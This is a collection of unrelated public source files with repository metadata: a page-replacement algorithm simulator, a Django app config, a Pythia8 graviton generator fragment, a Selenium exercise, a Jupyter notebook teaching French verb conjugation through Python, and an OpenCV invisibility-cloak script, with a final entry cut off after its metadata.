|
9db7580e07fa14bdd6136540b3edbc790d26733b
|
aa6ebe6ce8795c7a732ecd0fed658e57c5ca4187
|
/paging.py
|
17b6166e400655d6694de11f4292d99c964685b0
|
[] |
no_license
|
moses-netshitangani/Page-Replacement-Algorithm
|
e5f609bf7471bdb8e152e99b0cd9ae9677ca2ffe
|
6eb4bfea0534b96be9c34ed02a0ac60cdcf82914
|
refs/heads/master
| 2022-09-04T13:47:49.802598
| 2020-05-25T11:44:05
| 2020-05-25T11:44:05
| 264,755,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,086
|
py
|
# Program to simulate the FIFO, LRU and Optimal page replacement algorithms
# Names: Moses Netshitangani
# Student number: NTSNDI017
# Date: 16 May 2020
import random
import sys
# FIFO implementation
def FIFO(size, page_sequence_fifo):
print(' FIFO '.center(80, "*"))
page_faults = 0
# 2D array to store page:age values. Acts as main memory
memory_dict = []
# insert rest of pages into memory
for i in range(0, len(page_sequence_fifo)):
page = page_sequence_fifo[i]
# insert into new frame only if frame size not full
if len(memory_dict) < size and check(page, memory_dict) == -1:
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict.append([page, 0])
elif check(page, memory_dict) != -1:
# means it's a hit. No need to reset page age's value
memory_dict = grow_age(memory_dict)
else:
# replace the oldest page in memory
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict[oldest(memory_dict)] = [page, 0]
show_memory(memory_dict)
return page_faults
# LRU implementation
def LRU(size, page_sequence_lru):
print(' LRU '.center(80, "*"))
page_faults = 0
# 2D array to store page:age values. Acts as memory
memory_dict = []
# insert rest of pages into memory
for i in range(0, len(page_sequence_lru)):
page = page_sequence_lru[i]
# insert into new frame only if frame size not full
if len(memory_dict) < size and check(page, memory_dict) == -1:
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict.append([page, 0])
elif check(page, memory_dict) != -1:
# means it's a hit. Replace page's age value with 0, as if it were new
memory_dict = grow_age(memory_dict)
memory_dict[check(page, memory_dict)] = [page, 0]
else:
# replace the least recently used page in memory
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict[oldest(memory_dict)] = [page, 0]
show_memory(memory_dict)
return page_faults
# Optimal implementation
def OPT(size, page_sequence_opt):
print(' OPT '.center(80, "*"))
page_faults = 0
# 2D array to store page:age values. Acts as memory
memory_dict = []
# insert rest of pages into memory
for i in range(0, len(page_sequence_opt)):
page = page_sequence_opt[i]
# insert into new frame only if frame size not full
if len(memory_dict) < size and check(page, memory_dict) == -1:
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict.append([page, 0])
elif check(page, memory_dict) != -1:
# means it's a hit.
memory_dict = grow_age(memory_dict)
else:
# replace page that won't be used the most in the future, or the closest page using indices.
page_faults += 1
memory_dict = grow_age(memory_dict)
memory_dict[future(i + 1, page_sequence_opt, memory_dict)] = [page, 0]
show_memory(memory_dict)
return page_faults
# returns index of page that is least used in the future
def future(start_index, page_numbers, memory_dict):
# putting all in-memory pages into an array for comparison
pages = []
ages = []
for pairs in memory_dict:
pages.append(pairs[0])
ages.append(pairs[1])
pages_copy = pages.copy()
# determining which in-memory page is least used in the future
for i in range(start_index, len(page_numbers)):
future_page = page_numbers[i]
if future_page in pages:
pages.pop(pages.index(future_page))
if len(pages) == 1:
# this is the page that gets used the latest in the future
return pages_copy.index(pages[0])
return pages_copy.index(pages[0])
# prints out pages in a formatted way
def show_memory(memory_array):
print('Final state of memory: ', end=" ")
for i in range(0, len(memory_array)):
print(memory_array[i][0], end=" ")
print()
# returns index of oldest page in memory
def oldest(memory_dict):
max_age = -1
index = -1
for i in range(0, len(memory_dict)):
if memory_dict[i][1] > max_age:
max_age = memory_dict[i][1]
index = i
return index
# checks to see if page is in memory
def check(page, memory_dict):
for i in range(0, len(memory_dict)):
if page == memory_dict[i][0]:
return i
return -1
# increments the 'age' values of each page in memory
def grow_age(memory_dict):
for page in memory_dict:
page[1] = page[1] + 1
return memory_dict
# converts user-entered page_sequence into sequence of integers
def process_pages(page_sequence):
sequence = page_sequence[1:len(page_sequence)-1].split(',')
pages = []
for page in sequence:
pages.append(eval(page))
return pages
def create_random_pages(pages):
# Creating array of random integers between 0-9 to
pages = int(pages)
page_string = []
i = 0
while i < pages:
page_string.append(int(random.random() * 10))
i += 1
return page_string
def main():
frame_size = sys.argv[1]
if len(sys.argv) == 3 and sys.argv[2][0] != '[':
# Sequence length has been provided
page_sequence = create_random_pages(sys.argv[2])
print('\nPage sequence to be used: ', page_sequence, '\n')
print('FIFO ', FIFO(eval(frame_size), page_sequence), 'page faults \n')
print('LRU ', LRU(eval(frame_size), page_sequence), 'page faults \n')
print('OPT ', OPT(eval(frame_size), page_sequence), 'page faults \n')
elif len(sys.argv) == 3 and sys.argv[2][0] == '[':
# Page sequence has been provided
page_sequence = process_pages(sys.argv[2])
print('\nPage sequence to be used: ', page_sequence, '\n')
print('FIFO ', FIFO(eval(frame_size), page_sequence), 'page faults \n')
print('LRU ', LRU(eval(frame_size), page_sequence), 'page faults \n')
print('OPT ', OPT(eval(frame_size), page_sequence), 'page faults \n')
else:
# Sequence length has not been provided. Choose a random sequence between 10 and 50
page_sequence = create_random_pages(random.randint(10, 50))
print('\nPage sequence to be used: ', page_sequence, '\n')
print('FIFO ', FIFO(eval(frame_size), page_sequence), 'page faults \n')
print('LRU ', LRU(eval(frame_size), page_sequence), 'page faults \n')
print('OPT ', OPT(eval(frame_size), page_sequence), 'page faults \n')
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: python paging.py frame_size\nOR\npython paging.py frame_size sequence_length\nOR\npython '
'paging.py frame_size page_sequence(as a square-bracket enclosed comma-separated string e.g [7,5,8,4,'
'6])')
else:
main()
|
[
"netshitanganimoses@gmail.com"
] |
netshitanganimoses@gmail.com
|
2753a2f1b8978475f243ef3e9a55becc93d2311b
|
891632ddf75dd51d27a84b6bb4425be48f4a1dc3
|
/posts/apps.py
|
00ec9d735e522532b6a331245b6e4a0523733c49
|
[] |
no_license
|
Daniel-Alba15/Instagram-clone
|
a0c554abb6332c7deee743b150ad6ad2db609f34
|
7aab5794d089552d056eb7986d9beab40c207d33
|
refs/heads/master
| 2023-04-16T15:58:12.065171
| 2021-04-13T04:00:44
| 2021-04-13T04:00:44
| 338,584,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 111
|
py
|
from django.apps import AppConfig
class PostsConfig(AppConfig):
name = 'posts'
verbose_name ='Posts'
|
[
"danielorlandoa8@gmail.com"
] |
danielorlandoa8@gmail.com
|
353562321539d9ccedca62c846aca50ab793e19c
|
79b1d3d8ffbda5297fff6fefe2528e303bf2110a
|
/RSGGenFragment/RSToGG/RSGravitonToGluonGluon_W-0p3_M_1500_TuneCUETP8M1_13TeV_pythia8_cfi.py
|
12c5bb5688841800cd878b05928dba9baf198d70
|
[] |
no_license
|
yguler/MCFragments-1
|
25745a043653d02be3a4c242c1a85af221fc34b3
|
7c4d10ee59e00f997221109bf006819fd645b92f
|
refs/heads/master
| 2021-01-13T14:09:12.811554
| 2016-12-11T15:57:37
| 2016-12-11T15:57:37
| 76,184,433
| 0
| 0
| null | 2016-12-11T15:59:22
| 2016-12-11T15:59:22
| null |
UTF-8
|
Python
| false
| false
| 1,311
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
comEnergy = cms.double(13000.0),
crossSection = cms.untracked.double(0.00000136),
filterEfficiency = cms.untracked.double(1),
maxEventsToPrint = cms.untracked.int32(0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'ExtraDimensionsG*:gg2G* = on',
'ExtraDimensionsG*:kappaMG = 2.493343987',
'5100039:m0 = 1500',
'5100039:onMode = off',
'5100039:onIfAny = 21'
),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters',
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"emine.gurpinar@cern.ch"
] |
emine.gurpinar@cern.ch
|
bedffb393db9fa4276cd2bbbb36fdd19113a52af
|
d29b4d3bf8c0447dfa05fbf55105a6c5a6049e98
|
/lianxicode/do1_find_element.py
|
ddeb0bf84ddd7485ac348de761e8332b1c13acf4
|
[] |
no_license
|
gaoyang1224/UI
|
da9193396019ef69e0bd3d667d01bf00291189b7
|
daaa957365fa9ad6fb2f6ee5e377d752e2f1b676
|
refs/heads/master
| 2023-05-13T17:31:40.885877
| 2021-06-07T23:51:54
| 2021-06-07T23:51:54
| 371,928,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
from selenium import webdriver
driver = webdriver.Chrome()
url = 'http://www.douban.com'
driver.get(url)
ele = driver.find_element_by_name('q')
print(ele)
# 打印标签名
print(ele.tag_name)
# 属性和方法
print(ele.send_keys('你好呀'))
# 获取元素的属性
print(ele.get_attribute('maxlength'))
# find_element和find_elements的区别
ele = driver.find_elements_by_name('q')
print(ele)
"""find_element得到的是一个WebElement的对象
find_elements得到的是一个列表"""
"""
try:
driver.find_element_by_name('q')
print("元素存在")
except:
print("元素不存在")
"""
driver.close()
|
[
"15195989321@163.com"
] |
15195989321@163.com
|
c652632d211658bbfdb06e51eb66e4c66077b4ab
|
23f7a8233ef6ac3d84ad46b3e2b7b65726b64949
|
/_build/jupyter_execute/curriculum-notebooks/Languages/FrenchVerbCodingConjugation/french-verb-coding.py
|
1b500468223ac4d339f79662c7e09cbb01752e9a
|
[
"LicenseRef-scancode-unknown-license-reference",
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
BryceHaley/curriculum-jbook
|
75de835177bd6abef8150e951e933ff194530f89
|
d1246799ddfe62b0cf5c389394a18c2904383437
|
refs/heads/master
| 2023-03-04T11:50:42.628281
| 2021-02-19T00:38:26
| 2021-02-19T00:38:26
| 328,003,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,465
|
py
|

<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Languages/FrenchVerbCodingConjugation/French-Verb-Coding.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# French Verb Coding
----
## Introduction
In this Jupyter Notebook by Callysto you will learn about French verb conjugation and some basics of programming in Python.
Mastering the basics of verb conjugation is essential to reading and writing in French. There are some basic rules and exceptions that should be addressed and to learn those details, you should look at this other Callysto notebook: [French-Verb-Conjugation](CC-186-French-Verb-Coding.ipynb)
For this notebook, we will only look at the **regular** French verbs and see how we can use them in a program to conjugate automatically. Along the way you will gain some insight into how this notebook was made and thus gain some exposure to some programming concepts.
#### Necessary background
- Some basic knowledge of French
- Elementary Python syntax
#### Allons-y!
## Startup code
This notebook will use Python code. To get started, we need to load in a few modules that have useful "helper" functions to get us going. Be sure to run the following code to get these modules activated.
from IPython.display import display, clear_output, Markdown
import ipywidgets as widgets
import plotly as py
import plotly.graph_objs as go
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
init_notebook_mode(connected=True)
## Personal pronouns
In order to start conjugating verbs, we must first learn what are the personal pronouns in French. These correspond to the usual English pronouns like I, you, he, she, etc. It is nice to put this into a table so the display is pretty.
We can make three lists or words, which are just strings of characters surrounded by quotes which indicate the start and end of each word. These three lists are stored as **variables,** as follows:
```
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
english = ['I','you','she, he, one','we','you (plural or formal)','they']
person = ['First','Second','Third','First (plural)','Second (plural)','Third (plural)']
```
We then construct a table using some standard Python code, from a package called 'Plotly.' Don't worry too much about the details -- you can read about them on the Plotly web pages. For now, just notice that our three variables show up in the code at this line:
```
values = [person,french,english],
```
That line tells the table builder where to get our words, to put into the table.
With this following code, we build and display a table showing the subject pronouns in French. These pronouns will be used to separate the different cases of verb conjugation.
#table for personal pronouns using plotly
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
english = ['I','you','she, he, one','we','you (plural or formal)','they']
person = ['First','Second','Third','First (plural)','Second (plural)','Third (plural)']
trace0 = go.Table(
columnorder = [1,2,3],
columnwidth = [10,10],
header = dict(
values = ['Person','French','English'],
line = dict(color = 'rgb(0,0,0)'),
fill = dict(color = 'rgb(0,35,48)'),
align = ['center','center'],
font = dict(color = 'white', size = 16),
height = 40
),
cells = dict(
values = [person,french,english],
line = dict(color = 'black'),
fill = dict(color = 'rgb(95,102,161)'),
align = ['center', 'center'],
font = dict(color = 'white', size = 14),
height = 30
)
)
layout = dict(
width=750,
height=450
)
data = [trace0]
fig = dict(data = data, layout = layout)
iplot(fig)
Our verb conjugation rules will be based on these personal pronouns, so it is good to get familiar with their translations. French makes a distinction between all of these different tenses based on their person, whether or not they are masculine or feminine, and if they are plural or singular.
## Regular "er" verbs
Let's now look at the general rubric for conjugating verbs that end in **er** in the present tense.
We will illustrate this with the verb "parler" (to speak). The stem of the verb parler is "parl-". We conjugate it by adding on the endings "e", "es", "e", "ons", "ez" "ent" for the corresponding pronouns. We put these into the data structure for the table, and build it as follows:
(Be sure to run the following cell, to generate the table.)
french = ['je','tu','elle, il, on','nous','vous','elles, ils']
stem = ['parl-','parl-','parl-','parl-','parl-','parl-']
ending = ['e','es','e','ons','ez','ent']
conjug = ['parle','parles','parle','parlons','parlez','parlent']
trace0 = go.Table(
columnorder = [1,2],
columnwidth = [10,10],
header = dict(
values = ['Pronoun','Conjugation'],
line = dict(color = 'rgb(0,0,0)'),
fill = dict(color = 'rgb(0,35,48)'),
align = ['center','center'],
font = dict(color = 'white', size = 16),
height = 40
),
cells = dict(
values = [french,conjug],
line = dict(color = 'black'),
fill = dict(color = 'rgb(95,102,161)'),
align = ['center', 'center'],
font = dict(color = 'white', size = 14),
height = 30
)
)
layout = dict(width=500, height=450)
data = [trace0]
fig = dict(data = data, layout = layout)
iplot(fig)
This can be taken as the general rule for conjugating **er** verbs in the present tense. All you need to do is find the *stem* of the verb, which was parl- in this case, and then apply these endings to figure out how to conjugate the verb for every personal pronoun.
We now try to apply this using code.
## Coding Examples
---
How could one write code to see if someone conjugated a verb correctly? The following exercise will test your knowledge of French verb conjugation and also introduce you to some aspects of coding.
Let's start the coding with an example. I ask you to input an answer to: "Conjugate the verb *fermer* to the first person singular in the present tense". How do I check whether or not you input the correct answer?
In reular Python, to get a user to input a value, we create a *variable* that holds the user input:
``` python
x = input()
```
then test that variable to see if it is correct or not.
However, in a Jupyter notebook like this one, it is better to create a **text widget** which is simply a small text box on the screen where the user can type in his or her answer. We create and display the widget two commands like this:
``` python
aText = widgets.Text(value = None,
placeholder = "Conjugate 'fermer' present tense, 1st person singular.")
display(aText)
```
The variable aText just refers to the text box that will be on the screen, and the placeholder is the instruction that will be placed in that box.
When the user enters a word in the box, we want the computer to *do something.* In this case, we should define a function that does what we want. Here is a definition of the *doIt* function that does what we want: tests the text in the box to see if it is correct or not:
``` python
def doIt(x):
clear_output()
display(x)
if x.value != None:
if x.value == "ferme":
print('Correct!')
else:
print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
return
```
In this function, the variable x just points to our text box, and x.value is a **string**, which a short list of characters, that the user has typed into the box. This will be what we use to check against the correct answer. In our case, the correct answer is "ferme" and we use the **if** statement to check.
The code above deserves some explanation.
- We used the quotations around the answer (`'ferme'`) as this is how Python recognizes strings. Since our variable x.value was held as a string we want to check it against something that is itself a string.
- If you want to check that the variable is equal to the correct answer we used ==.
- The `print` statement was the operation that we chose to do when the `if` statement was fulfilled.
- The if statement requires the colon at the end of the statement and whatever operation you choose to perform given that the statement is fulfilled needs to be indented within the statement.
Finally, we must tell the aText object to attach the doIt function to itself, so it runs the code once the user enters the text and hits the return button.
The final code looks like this:
aText = widgets.Text(value = None,
placeholder = "Conjugate 'fermer' present tense, 1st person singular.")
display(aText)
def doIt(x):
clear_output()
display(x)
if x.value != None:
if x.value == "ferme":
print('Correct!')
else:
print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
return
aText.on_submit(doIt)
** Try it! ** Enter some text in the box above to see what happens for the correct and incorrect cases.
## Generalizing
---
Code that has multiple uses, and is more broadly useful, is typically a lot more valuable. In our case, how could we write a program that checks the correct answer for any verb, tense, and personal pronoun? This would be a generalization of the simple case that we constructed above. This is a lot more of a complex problem that will have to be broken down.
The exercise will be: Conjugate the verb "___ -er" in the present tense in every subject.
Since we have knowledge of the endings for "-er" verbs in the present tense, our problem reduces to analyzing if each of the student's answers fits the form that the conjugated verb should take in that subject. Steps we require then:
1. We need to extract the root from each verb.
2. See if the remainder of the verb has the correct ending.
3. Make sure all answers are correct.
To achieve this we will employing the use of a *list*. A list is a data type which has some sort of ordering to it. The ordering gives us the means to *index* an *element* of the list. For example, we have the list:
```python
subjects = ['je','tu','il, elle, on','nous','vous','ils/elles']
```
(Note the square brackets)
"subjects" is a comma separated list of string objects. We can do things like index the list:
```python
subjects[0] = 'je'
subjects[1] = 'tu'
subjects[2] = 'il, elle, on'
```
Notice how the indexing starts from 0. This means if you have **n** elements in a list `v`, and you want to index the last element of the list, you would write `v[n-1]`.
What is the value of `subjects[4]`? Run the following code to test yourself:
#Simple list test
a = widgets.Text(value = None, placeholder = "What is the value of subjects[4]?")
display(a)
def callback(sender):
clear_output()
display(a)
if a.value != None:
if a.value == "vous":
print('Correct!')
if a.value != "vous":
print('Incorrect, please try again. Make sure you use only letters, no quotes, no spaces.')
return
a.on_submit(callback)
A more useful list to us would be:
``` python
endings = ['e','es','e','ons','ez','ent']
```
These are the verb endings given for conjugating "-er" verbs in the present tense. Now we just need to some means of analyzing their answer to see if they used the right ending.
Say that we store all of their answers in a list like:
```python
answers = ['x1','x2','x3','x4','x5','x6']
```
This elements of the list, labelled "x1, x2, ..." are variables, which are themselves strings. Their position in the list indicates which subject they were trying to conjugate to, for instance x1 $\rightarrow$ 'je'. The convenience of storing the answers like this will become apparent soon.
If we wanted to perform a simple check, say whether or not they simply got the correct form, and not necessarily the correct spelling, we would use the following:
```python
for i in range(0,6):
n = len(endings[i])
if answers[i][-n:] != endings[i]:
print('Incorrect')
```
**What does this do?**
This short little piece of code checks to see if they got the right ending. Let's look at some the tools that it uses.
**What does the `for` statement do?**
```python
for i in range(0,6):
```
This is another essential programming tool known as the `for` loop. Within the `for` loop, the indented code block is executed, then the next iteration of the loop is performed, in our case the index $i$ is increased to $i+1$. This continues until all iterations are done. It provides a means of counting or iterating through a process. In our case we want to iterate over every element in the list and perform the check in the `if` statement.
Notice the code `range(0,6)` tells us the index `i` will start at `i=0` and end at `i=5`. It stops before 6.
**The `if` statement**
Again we used the "!=" to see if two strings are not equal to each other. Firstly, we have declared a variable in the loop:
```python
n = len(endings[i])
```
This is simply the length of the ending. So for `endings[5]`, which is the string 'ent', the length is `n = 3`. This gives us a way of checking the last letters of the respective answer. We accomplish by using:
```python
answers[i][-n:]
```
The first index, `answers[i]` gives us the `i+1` element of the list answers (since we begin indexing from 0). e.g. `answers[3] = 'x4'`. The second index we used, `answers[i][-n:]`, indexes the element of the list. How are we indexing an already indexed list you might ask? Well, this is because a string is conveniently broken up into the characters that make it up. This gives us a way of indexing any "letter" of the string. For example, if `x1 = 'mange'` then `x1[3] = 'g'`. This is very nice for us, since we can employ this to check the ending of their answers. To index the last element of a string, or a list, we use the negative. e.g. `x1[-1] = 'e'`. To take out an entire section of a list or string we used "slice notation", this is why there is the extra colon. e.g. `x1[-3:] = 'nge'`. In our case we only wanted to index the last `n` letters of the string because this is the amount of letters in the ending that we wanted to check against. If all the answers were correct then the entire `for` loop would run and the `if` statement would never be fulfilled!
----
Now this was quite a bit of information, so let's test your knowledge on what we've done so far and then we'll work on generalizing this further for a different case.
For the lists:
```python
endings = ['e','es','e','ons','ez','ent']
answers = ['mange','manges','mange','mangeons','manger','mangent']
```
ques1 = "Which element of answers is incorrect? Use index notation , i.e. `answers[]`"
ques2 = "What part should be changed? Use the double index notation, i.e. `answers[][]`"
ques3 = "What should the ending be? Use index notation again, i.e. `endings[]`"
ques4 = "If I wanted to check the first three answers, how would the `for` loop initial statement look like? \
Please use `i` as the index."
ans1 = widgets.Text(value = None)
ans2 = widgets.Text(value = None)
ans3 = widgets.Text(value = None)
ans4 = widgets.Text(value = None)
def callback1(sender):
if ans1.value != None:
clear_output()
display(Markdown(ques1))
display(ans1)
if ans1.value == 'answers[4]' or ans1.value == 'answers[-2]':
display(Markdown('Correct!'))
else:
display(Markdown('Not quite! Please try again.'))
display(Markdown(ques2))
display(ans2)
display(Markdown(ques3))
display(ans3)
display(Markdown(ques4))
display(ans4)
return
def callback2(sender):
if ans2.value != None:
clear_output()
display(Markdown(ques1))
display(ans1)
display(Markdown(ques2))
display(ans2)
if ans2.value == 'answers[4][4:]' or ans2.value == 'answers[4][-2:]' or \
ans2.value == 'answers[4][-1]' or ans2.value == 'answers[4][5]':
display(Markdown('Correct!'))
else:
display(Markdown('Not quite! Please try again. You might need a colon in there.'))
display(Markdown(ques3))
display(ans3)
display(Markdown(ques4))
display(ans4)
return
def callback3(sender):
if ans3.value != None:
clear_output()
display(Markdown(ques1))
display(ans1)
display(Markdown(ques2))
display(ans2)
display(Markdown(ques3))
display(ans3)
if ans3.value == 'endings[4]' or ans3.value == 'endings[-2]':
display(Markdown('Correct!'))
else:
display(Markdown('Not quite! Please try again.'))
display(Markdown(ques4))
display(ans4)
return
def callback4(sender):
if ans4.value != None:
clear_output()
display(Markdown(ques1))
display(ans1)
display(Markdown(ques2))
display(ans2)
display(Markdown(ques3))
display(ans3)
display(Markdown(ques4))
display(ans4)
if ans4.value == 'for i in range(0,3):' or ans4.value == 'for i in range(3):':
display(Markdown('Correct!'))
else:
display(Markdown("Not quite! Please try again. Don't forget the colon :"))
return
ans1.on_submit(callback1)
ans2.on_submit(callback2)
ans3.on_submit(callback3)
ans4.on_submit(callback4)
display(Markdown(ques1))
display(ans1)
display(Markdown(ques2))
display(ans2)
display(Markdown(ques3))
display(ans3)
display(Markdown(ques4))
display(ans4)
## Automatic conjugation
Of course, the rules for conjugation for the regular verbs are very straightforward. So we could write code to handle these by computer. The basic rule is to decide whether the verb is an **er**, **ir**, or **re** verb. Based on that, we decide which endings to add onto the stem.
For instance, a simple **if** statement can check whether the verb is an **er** type, find the stem, and then compute the conjugations appropriately:
```
if aVerb.value[-2:]=='er':
stem = aVerb.value[:-2]
for i in range(6):
conjug[i] = stem+er_endings[i]
```
To handle the three different regular cases, we should have lists for the three different types of endings:
```
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
```
To put the code together, we can have three **if** statements to test which of the three types of verbs we have, then add on the appropriate endings to the stem. Some code to do this looks like the following. Try running it yourself.
pronouns = ['je','tu','elle, il, on','nous','vous','elles, ils']
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
stem = ''
aVerb = widgets.Text(value = None, description = 'Infinitive', placeholder = "Enter a verb")
display(aVerb)
def callback5(sender):
if aVerb.value != None:
if aVerb.value[-2:]=='er':
stem = aVerb.value[:-2]
for i in range(6):
conjug[i] = stem+er_endings[i]
clear_output()
display(aVerb)
display(Markdown('An **er** verb with stem **' + stem + '-**' + ' and conjugations:'))
display(conjug)
return
if aVerb.value[-2:]=='ir':
stem = aVerb.value[:-2]
for i in range(6):
conjug[i] = stem+ir_endings[i]
clear_output()
display(aVerb)
display(Markdown('An **ir** verb with stem **' + stem + '-**' + ' and conjugations:'))
display(conjug)
return
if aVerb.value[-2:]=='re':
stem = aVerb.value[:-2]
for i in range(6):
conjug[i] = stem+re_endings[i]
clear_output()
display(aVerb)
display(Markdown('An **re** verb with stem **' + stem + '-**' + ' and conjugations:'))
display(conjug)
return
clear_output()
display(aVerb)
display(Markdown("I don't recongnize this kind of verb. Try again."))
return
aVerb.on_submit(callback5)
## Exceptions
Of course, this code does not handle exceptions, only the three regular cases.
#### Exercise
Try adding an **if** statement to test for an exception, say if the verb is "Avoir." In this case, the conjugation will be `['ai','as,'a','avons','avez','ont']`. See if you can modify the code above to handle this special case.
Should you test for exceptions first in your code, or test for the three regular cases first?
Once you succeed at that, try handling the exceptional verb "Être."
## Making it nice
Perhaps you liked the nice tables that we used to display verb conjugations, as in the notes above. We can add a function to our code that replicated this table. Our code then changes, to display the table instead of the list of conjugations. The resulting coding is as follows. Note the newly defined function `displayTable()` which builds the table for us.
pronouns = ['je','tu','elle, il, on','nous','vous','elles, ils']
er_endings = ['e','es','e','ons','ez','ent']
ir_endings = ['is','is','it','issons','issez','issent']
re_endings = ['s','s','','ons','ez','ent']
stem = ''
aVerb2 = widgets.Text(value = None, description = 'Infinitive', placeholder = "Enter a verb")
display(aVerb2)
def callback6(sender):
if aVerb2.value != None:
if aVerb2.value[-2:]=='er':
stem = aVerb2.value[:-2]
for i in range(6):
conjug[i] = stem+er_endings[i]
clear_output()
display(aVerb2)
display(Markdown('An **er** verb with stem **' + stem + '-**'))
displayTable2()
return
if aVerb2.value[-2:]=='ir':
stem = aVerb2.value[:-2]
for i in range(6):
conjug[i] = stem+ir_endings[i]
clear_output()
display(aVerb2)
display(Markdown('An **ir** verb with stem **' + stem + '-**'))
displayTable2()
return
if aVerb2.value[-2:]=='re':
stem = aVerb2.value[:-2]
for i in range(6):
conjug[i] = stem+re_endings[i]
clear_output()
display(aVerb2)
display(Markdown('An **re** verb with stem **' + stem + '-**'))
displayTable2()
return
clear_output()
display(aVerb2)
display(Markdown("I don't recongnize this kind of verb. Try again."))
return
aVerb2.on_submit(callback6)
def displayTable2():
trace0 = go.Table(
columnorder = [1,2],
columnwidth = [10,10],
header = dict(
values = ['Pronoun','Conjugated'],
line = dict(color = 'rgb(0,0,0)'),
fill = dict(color = 'rgb(0,35,48)'),
align = ['center','center'],
font = dict(color = 'white', size = 16),
height = 40
),
cells = dict(
values = [pronouns,conjug],
line = dict(color = 'black'),
fill = dict(color = 'rgb(95,102,161)'),
align = ['center', 'center'],
font = dict(color = 'white', size = 14),
height = 30
)
)
layout = dict(width=500, height=450)
data = [trace0]
fig = dict(data = data, layout = layout)
iplot(fig)
## Many exceptions
Of course, French has many exceptions to the rules for conjugating verbs. To write code to handle them all, you could consider creating a list will all the exceptions in it, and a corresponding list of conjugations for each exception.
Try this out if you like -- this is an interesting exercise in understanding the complexity of a language, as not everything is simply a simple set of rules. It is also an interesting exercise in how to make code that can handle such complexity.
---
## Conclusion
In this Jupyter Notebook by Callysto you learned the basics of French verb conjugation in the present tense. You also learned about some basic aspects used in programming such as `for` loops, `if` statements. You additionally learned about strings, lists, and indexing. You were also challenged to see to create your own program for dealing with irregular verbs.
We saw that we could expose the structure of the French verb conjugation rules to compose a program that creates the correct responses to conjugate a verb in the present tense. This is somewhat of a hallmark of coding. Taking some sort of structure of the problem at hand and exposing in the form of generalizable and applicable written code. Breaking down problems in this fashion is essential to computational thinking.
Je vous remercie d'avoir essayé les exercices donnés.
[](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md)
|
[
"me@example.com"
] |
me@example.com
|
1669ed2d537f548a399a65c58ed375f14264d992
|
99afb3dac479339ce4a78b8526607944814065c5
|
/invisibilit-cloak-cv-project.py
|
68ad0ec6bc2805a073c2a4b321bf1a174eade6e5
|
[] |
no_license
|
lucciffer/Cloak-of-invisibility
|
ea633b4229148a3eeeab7e6f02147658b7468984
|
631bc1beeddb4eb89c79acd4b3392f5c2f2afd0b
|
refs/heads/main
| 2023-02-08T22:59:38.934739
| 2020-12-30T08:22:05
| 2020-12-30T08:22:05
| 325,494,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
#libraries import
import numpy as np
import cv2
import time
cap = cv2.VideoCapture(0)
time.sleep(2)
background = 0
#capture background
for i in range(30):
ret, background = cap.read()
while(cap.isOpened()):
ret, img = cap.read()
if not ret:
break
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
#hsv limits
lowerRed = np.array([0, 120, 70])
higherRed = np.array([10, 255, 255])
mask1 = cv2.inRange(hsv, lowerRed, higherRed)
lowerRed = np.array([170, 120, 70])
higherRed = np.array([180, 255, 255])
mask2 = cv2.inRange(hsv, lowerRed, higherRed)
mask1 = mask1 + mask2
mask1 = cv2.morphologyEx(mask1, cv2.MORPH_OPEN, np.ones((3, 3), np.uint8), iterations=2) #noise reduction
mask1 = cv2.morphologyEx(mask1, cv2.MORPH_DILATE, np.ones((3, 3), np.uint8), iterations=1)
mask2 = cv2.bitwise_not(mask1)
res1 = cv2.bitwise_and(background, background, mask= mask1)
res2 = cv2.bitwise_and(img, img, mask = mask2)
finalOutput = cv2.addWeighted(res1, 1, res2, 1, 0)
cv2.imshow('invisibility cloak!',finalOutput)
k = cv2.waitKey(10)
if k == 27:
break
cap.release()
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
lucciffer.noreply@github.com
|
5b4c21d5f50fa349555f06ee48bc17ba21d6fd47
|
e7bdba95eea50797b4254b8643564511a84f5937
|
/problem_solving/different_problem/acronym.py
|
609128d08ada3bb7353c488b5f85a19fe7183447
|
[] |
no_license
|
abiryusuf/Python_Algorithms
|
04bb54f7e6f733b1a38f2b27583e71274535b8ee
|
590809510fde74407a6a75e5c889cc1969d78ff8
|
